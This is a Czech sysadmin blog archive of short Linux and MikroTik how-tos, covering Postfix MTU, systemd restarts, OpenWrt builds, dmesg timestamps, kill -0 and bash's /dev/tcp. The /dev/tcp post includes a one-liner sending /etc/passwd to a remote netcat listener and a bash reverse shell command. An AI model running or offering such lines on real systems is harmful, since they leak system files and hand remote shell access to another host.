Archiv pro štítek: howto

Linux mini-howto: Postfix MTU lost connection

Linux mini-howto?
Krátce o nástrojích ze života sysadmina.

Postfix MTU a lost connection after …

Podivné chování poštovního serveru Postfix nemusí být nutně způsobené chybnou konfigurací služby samotné, problémy s velikostí MTU jsou o to zákeřnější díky své relativně skryté povaze a “chaotickému” chování, na problém s doručování pošty ve vztahu k MTU jsme nedávno narazili u zákazníka a proto tento mikro-post, ať to neztratíme a třeba to i pomůže někomu dalšímu. Pokračování textu Linux mini-howto: Postfix MTU lost connection

Linux mini-howto: Systemd automatický restart služby při selhání.

Linux mini-howto?
Krátce o nástrojích ze života sysadmina.

Systemd a restart služby při selhání


Systemd je “nový” init systém pro správu služeb navržený exkluzivně pro Linux s cílem nahradit původní SysV init scripty pocházející z System V unix větve a i přes jistou kontroverzi se stává (stal) novým standardem ve světě Linuxu, najdeme ho v drtivě většině mainstream distribucí a je potřeba naučit se s ním žít.

Jednou z operací, která se často řeší je automatický restart služby po jejím zhavarování, jsou služby, které požadujeme aby běželi na serveru neustále, tedy v případě jejich výpadku chceme zkusit automaticky restart, někdo si na to píše vlastní scripty nebo nasazuje nástroj Monit, daemontools či další, Systemd tuto funkci intergruje do sebe, proč ji nevyužit, pojďme na to, je to velmi jednoduché.

Pokračování textu Linux mini-howto: Systemd automatický restart služby při selhání.

Mikrotik mini-howto: Hlavní a záložní zavaděč RouterBOOT

Mikrotik mini-howto?
Krátce ze života sysadmina s RouterOS.

Hlavní a záložní zavaděč RouterBOOT


Zavaděč (bootloader) RouterBOOT je v zařízeních značky Routerboard software (firmware, kód) zodpovědný za inicializaci hardware po sepnutí napájení, vyhledání dostupného úložiště (NAND flash) a následné načtení operačního systému RouterOS do paměti a předání mu řízení. Pokračování textu Mikrotik mini-howto: Hlavní a záložní zavaděč RouterBOOT

Instalace VMware ESXi z USB disku

Linux mini-howto?
Krátce o nástrojích ze života sysadmina.

Instalace VMware ESXi z USB disku


Standardní distribuce VMware je ve formě ISO obrazu (např. VMware-VMvisor-Installer-6.0.0-XXXXXX.x86_64.iso), je primárně určena k instalaci přes CD-ROM, “vypálit”, založit placku a instalovat. Bohužel velmi často dnes narazíme na servery s absencí CD/DVD mechaniky a protože nechce shánět externí USB mechaniku (i médiu může a bude jednou problém shánět), musíme si poradit jinak, VMware podporuje také instalaci ze sítě přes PXE, tato metoda může představovat opět jiné komplikace. Pokračování textu Instalace VMware ESXi z USB disku

Linux mini-howto: Základní pravidla bezpečnosti serverů

Linux mini-howto?
Krátce o nástrojích ze života sysadmina.

Základní pravidla bezpečnosti serverů

Proč? Základní představa o bezpečnosti serverů je často mylná nebo žádná, tímto soupisem praxí ověřených pravidel se jí pokusme nastínit, v některých případech jde obecná pravidla platná napříč světem IT v jinde cílíme přímo na UNIX systémy, znovu připomínáme jde o takový dobrý základ od čeho se odrazit a v případě zájmu můžeme pokračovat dalším dílem.

Bezpečnost IT systémů není stav, je to neustálý proces a i z toho důvodu je 100% zabezpečení přelud, kterého nelze dosáhnout, ale můžeme se k němu zkusit přiblížit, jediný bezpečný systém je ten který nemáte ala jediné auto které Vám nezestárne je to které jste si nekoupili.

Pokračování textu Linux mini-howto: Základní pravidla bezpečnosti serverů

Linux mini-howto: Blokujeme TOR EXIT nodes

Linux mini-howto?
Krátce o nástrojích ze života sysadmina.

Důvod proč blokovat přístup ke službám ze sítě Tor je na Vašem rozhodnutí a není předmětem tohoto článku.

Tor je anonymizační nástroj (software) maskující skutečný pohyb uživatele po internetové síti, ukrývající skutečnou IP adresu případně další informace, které mohou umožnit jeho sledování.

Pokračování textu Linux mini-howto: Blokujeme TOR EXIT nodes

Výstup dmesg pro lidi, dmesg-human-readable

Linux mini-howto?
Krátce o nástrojích ze života sysadmina.

Výstup dmesg pro lidi


Byl položen jednoduchý dotaz, jak udělat výpis dmesg čitelný pro lidi ? Co lidem vadí nejvíce na výstupu dmesg je nečitelnost času, “defaultně” je místo snadno čitelného formátu času vypisován tzv. timestamp a má to svůj důvod, výstup může vypadat např. takto.

Dmesg výstup s časem ve formátu timestamp.
Dmesg výstup s časem ve formátu timestamp.

Uznávám, že to může být komplikace, ale opět platí jak kdy, např. situace kdy je potřeba zjistit čas mezi událostí A a B je při reprezentaci času formátem timestamp snadno řešitelná, pouze odečtete dvě čísla a to je snadné.

Chci “normální” čas, né timestamp!

Nástroj dmesg je součástí balíku nástrojů util-linux (https://www.kernel.org/pub/linux/utils/util-linux/), kolem verze 2.20.x (rok ~ 2012) byla přidána volba pro dmesg -T (nebo –ctime), podívejme se na to.

# man dmesg
---
-T, --ctime
Print human readable timestamps. The timestamp could be inaccurate!
---

# root@www:~# apt-cache show util-linux | grep Version
Version: 2.20.1-5.3
# root@www:~# dmesg -T
Dmesg výstup s časem ve formátu pro lidi (human-readable).
Dmesg výstup s časem ve formátu pro lidi (human-readable).

Můj dmesg neumí “-T”

Zatím to bylo vcelku snadné, ale jsou situace kdy není magický parametr k dispozici, typicky na embedded zařízení, např. OpenWrt routery s busybox nebo prostě máte starší verzi util-linux, zde si pomůžeme jednoduchým bash scriptem, uložte si ho např. do /usr/local/bin/dmesgh a nastavte ho jako spustitelný (chmod +x dmesgh), nejsem autorem, publikuji tak jak je, mám ho už roky ke spokojenosti.

#!/bin/bash
# Translate dmesg timestamps to human readable format

# desired date format
date_format="%a %b %d %T %Y"

# uptime in seconds
uptime=$(cut -d " " -f 1 /proc/uptime)

# run only if timestamps are enabled
if [ "Y" = "$(cat /sys/module/printk/parameters/time)" ]; then
  dmesg | sed "s/^\[[ ]*\?\([0-9.]*\)\] \(.*\)/\\1 \\2/" | while read timestamp message; do
    printf "[%s] %s\n" "$(date --date "now - $uptime seconds + $timestamp seconds" +"${date_format}")" "$message"
  done
else
  echo "Timestamps are disabled (/sys/module/printk/parameters/time)"
fi

Výstup je stejný jako v předchozím případě, dokonce jak je vidět ze scriptu provádí kontrolu zda-li jsou ve výstupu jádra povoleny timestamp, je možné je zcela potlačit.

#man dmesg

Studujte manuály, užívejte moudře, díky za pozornost.
František Havel, MOJEservery.cz

Kompilace OpenWrt pro ARM, Raspberry Pi

Komplikace OpenWrt pro ARM, Raspberry Pi


Nejrychlejší komplikace OpenWrt, pro úplné nováčky, nebojte se postavit si vlastní systém na míru, dle vlastních potřeb, díky automatizovanému build systému je to snadné.

openwrt-logo

Komplikaci provedeme na Debianu, budeme potřebovat cca 4GB volného místa a trpělivost, OpenWrt má vlastním buildovácí systém (Buildroot,  můžete na něj narazit leckde, je to populární nástroj pro sestavení embedded Linuxu) pro cross-compile (sestavuje na x86 ale výstup poběží na jiné platformě).

Nainstaluje nezbytné věci pro překlad,vývoj a git (build-essential, ať žije síla balíčkovacích systému), poté klonujeme git repozitář OpenWrt, jdeme na to.

root@havel-machine:~# apt-get install git-core build-essential libssl-dev
root@havel-machine:~# apt-get install libncurses5-dev unzip
root@havel-machine:~# apt-get install subversion mercurial

Budeme stahovat tzv. bleeding edge(trunk) verzi.

havel@havel-machine:~/Work$ git clone git://git.openwrt.org/openwrt.git
Cloning into 'openwrt'...
remote: Counting objects: 320253, done.
remote: Compressing objects: 100% (87004/87004), done.
remote: Total 320253 (delta 220190), reused 318758 (delta 219174)
Receiving objects: 100% (320253/320253), 112.66 MiB | 601.00 KiB/s, done.
Resolving deltas: 100% (220190/220190), done.
Checking connectivity... done.

Tak, máme základ OpenWrt stažen (cca 200MB), nyní potřebujeme balíčky (feeds, potravu) pro sestavení, další se budou dotahovat podle toho vše budeme chtít začlenit.

havel@havel-machine:~/Work$ cd openwrt
havel@havel-machine:~/Work/openwrt$ ./scripts/feeds update -a
havel@havel-machine:~/Work/openwrt$ ./scripts/feeds install -a

Tak konsole na nás hodně křičela, stáhlo se cca dalších 50MB dat, ale nebojte se ničeho, pokračuje dále k sestavení.

havel@havel-machine:~/Work/openwrt$ make defconfig
havel@havel-machine:~/Work/openwrt$ make prereq
havel@havel-machine:~/Work/openwrt$ make menuconfig

Po poslední příkazu se dostáváme k textovému menu, zde si vybereme co chceme sestavit, pro jakou architekturu, jaké balíčky zahrneme (ty se následně stáhnout ve formě zdrojového kódu a zkompilují), jak krásné a jednoduché.

openwrp-compile-menuconfig

Nejklíčovější je výběr správné cílové architektury (target), otevřete menu, vyberte Broadcom BCM2708/BCM2709 pro Raspebrry Pi 2, stejným způsobem můžete přeložit OpenWrt pro cokoliv jiného, výběr je velmi široký.  openwrp-compile-menuconfig-bcm27xx

Doporučuji si pohrát s v menu Target images -> Boot SD card partition size a Root filesystem partition size , což jsou velikosti oddílů pro boot a root, jako filesystém nechávám ext4.

V kernel -> Wireless si vyberte ovladače pro bezdratové adaptéry pokud je budete používat, já jsem si ještě začlenil VLAN (802.1q), zabbix agenta, LuCI, LuCI Asterisk, coova-chilli a pár dalších, hodí se i wpa_supplicant, obecně menuconfig je velmi bohatý projděte se ho až budete mít chvilku, vše co zaškrtáte má vliv na dobu komplikace, množství stahovaných dat i výslednou velikost image.

Jdeme buildovat (komplikovat), pozor z menuconfig vyberte Save, uložte do souboru .config a až poté exit.

*** End of the configuration.
*** Execute 'make' to start the build or try 'make help'.
havel@havel-machine:~/Work/openwrt$ make -j 3
 make[1] world
 make[2] tools/install
 make[2] package/cleanup
 make[3] -C tools/patch compile
 make[3] -C tools/expat compile
 make[3] -C tools/sstrip compile
 make[3] -C tools/make-ext4fs compile
 ... čekejte a čekejte ...
 ... pokud jste pozorní všimnete si, že openwrt si samo sestavilo gcc (překladač, či obecně tzv. toolchain) pro své pokračování v překladu ...
 make[3] -C toolchain/gcc/final compile
 make[3] -C toolchain/gcc/final install
 make[2] target/compile
 make[3] -C target/linux compile
openwrt-compile-top-cpuload
Překladače se neflákají a vytěžují systém, parametr -j 3 v příkazu make povoluje právě instance překladače zároveň.

Hotovo, výstup (připravený image) najdete v openwrt/bin/ , OpenWrt build automaticky sestavil image pro modely Raspberry b,b+ a CM (Compute Module).

openwrt-brcm2708-bcm2708-rpi-b-ext4-sdcard.bin
openwrt-brcm2708-bcm2708-rpi-b-plus-ext4-sdcard.bin
openwrt-brcm2708-bcm2708-rpi-cm-ext4-sdcard.bin

Instalace, pomocí nastroje dd vemte potřebný image a zapište na SD kartu /dev/sdX , dd if=image of=/dev/sdX bs=2M a je nainstalováno.

Kde sehnat balíčky pro opkg ?

OpenWrt obsahuje balíčkovací systém opkg, jde o repositáře s předkompilovaným software pro danou platformu, není nutné tedy software (userspace + ovladače) kompilovat pokud nechcete, ale ta možnost tu stále je. Pro úplnost, balíčky jsou soubory s koncovkou .ipk např. iperf_2.0.5-1_brcm2708.ipk.

http://wiki.openwrt.org/doc/packages

Pro Broadcom 2708 a 2709 tedy Raspberry Pi 2 použijte tento předkompilovaný repositář, nastavte si ho v /etc/opkg.con a udělejte opkg update, získáte přístup k rozsáhlému množství software.

https://downloads.openwrt.org/snapshots/trunk/brcm2708/generic/packages/base/

Hotovo, tak kompilujte, pokud bude zájem je možné si příště ukázat patchnutí a kompilace OpenWrt jako metarouter Mikrotik s instalací VoIP telefonní ústředny Asterisk, za velmi nízké náklady tak získáte router s Wifi, až ethernet 10portů pro LAN a VoIP telefony.

Užívejte moudře, díky za pozornost. František Havel, MOJEservery.cz.

Linux mini-howto: Bash /dev/tcp a sokety.

Linux mini-howto?
Krátce o nástrojích ze života sysadmina.

Bash a sokety, /dev/tcp

Věděli jste, že bash obsahuje build-in (vestavěné) BSD socket rozhraní dostupné skrze /dev/tcp? Pseudo zařízení slouží v bashi pro přímou interakci s TCP socketem.

Syntax /dev/tcp s /dev/udp

  • /dev/tcp/<host>/<port>
  • /dev/udp/<host>/<port>

Malá ukázka práce s /dev/tcp.

havel@havel-machine:~$ exec 5<>/dev/tcp/havel.mojeservery.cz/80
havel@havel-machine:~$ echo -e "GET / HTTP/1.0\n" >&5
havel@havel-machine:~$ cat <&5 | head -n 10
HTTP/1.1 200 OK
Server: nginx/1.2.1
Date: Tue, 01 Sep 2015 14:41:44 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.4.41-0+deb7u1
Vary: Accept-Encoding, Cookie
Cache-Control: max-age=3, must-revalidate
WP-Super-Cache: Served supercache file from PHP
havel@havel-machine:~$ cat </dev/tcp/time.nist.gov/13
57266 15-09-01 14:37:16 50 0 0 816.9 UTC(NIST) * 

Něco více divokého s /dev/tcp

# Na své stroji si rozjeďte netcat
root@www:/root# nc -l -p 8888

# Pošlete si co potřebujete k sobě
havel@havel-machine:~$ cat /etc/passwd > /dev/tcp/havel.mojeservery.cz/8888

# Reverse shell
# Na své stroji si rozjeďte netcat root@www:/root# nc -l -p 8888

havel@havel-machine:~$ bash -i >& /dev/tcp/havel.mojeservery.cz/8888 0>&1

# havel@havel-machine:~$ pwd
pwd
/home/havel

Pozn.: bash je nutné zkomplikovat s volbou (--enable-net-redirections).

Užívejte moudře a opatrně, díky za pozornost.

František Havel, MOJEservery.cz

Linux mini-howto: Monitoring procesů nástrojem kill!!!

Linux mini-howto?
Krátce o nástrojích ze života sysadmina.

Monitoring procesů s kill

havel@havel-machine:~$ kill -0

Tajné, pssst!

Nedokumentovaná (man kill) část nástroje kill, kill -0. Zcela dle neočekávání kill -0 nezabije proces, ani ho jinak neovlivní, vrací exitcode 0 pokud proces běží a akceptuje signály a naopak pokud neběží  vrací 1.

havel@havel-machine:~$ echo $$
10231
havel@havel-machine:~$ /bin/bash
havel@havel-machine:~$ echo $$
12023
havel@havel-machine:~$ kill -0 12023
havel@havel-machine:~$ echo $?
0
havel@havel-machine:~$ exit
havel@havel-machine:~$ kill -0 12023
kill: kill 12023 failed: no such process
havel@havel-machine:~$ echo $?
1

Seznam dostupných signálů, 0 zde není. kill-monitoring-siglist

K čemu je to dobré? Napadá mě, využití např. jednoduché hlídání procesů (démonů) z /var/run/xyz.pid ( #kill -0 $(cat /var/run/crond.pid) ), určitě existují jiná i lepší řešení (a nevím zda-li parsování ps je ono nebo průchod /proc/<pid>), ale jak už někdo poznamenal, proč, protože můžem.

Užívejte moudře a opatrně, díky za pozornost.

František Havel, MOJEservery.cz